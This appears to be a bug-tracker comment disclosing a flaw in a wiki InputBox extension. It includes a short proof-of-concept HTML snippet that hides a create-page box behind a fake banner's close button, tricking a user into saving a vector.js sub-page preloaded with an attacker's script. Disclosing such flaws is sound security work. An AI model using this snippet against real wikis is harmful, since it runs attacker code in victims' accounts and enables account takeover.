It looks like the extension can be used to make a user create e.g. a [[Special:MyPage/vector.js]] sub-page with any payload. The following example is disguised as a fake banner at the top of the page with a close button in the corner. Clicking the close button opens an edit window for a .js sub-page, preloaded with any payload the attacker wants. From there it's a single click on either "save" or even "preview" to execute this code on the user's machine.
```lang=html
<div style="position:absolute;top:0;right:0;width:100%;height:100px;background:#333;">
<div style="position:absolute;top:-19px;right:3px;">
<inputbox>
type = create
default = Special:MyPage/vector.js
preload = User:Attacker/payload.js
buttonlabel = ✕
hidden = 1
</inputbox>
</div>
</div>
```
It's only two button clicks for the user, at the moment. With T194606 it would be a single click.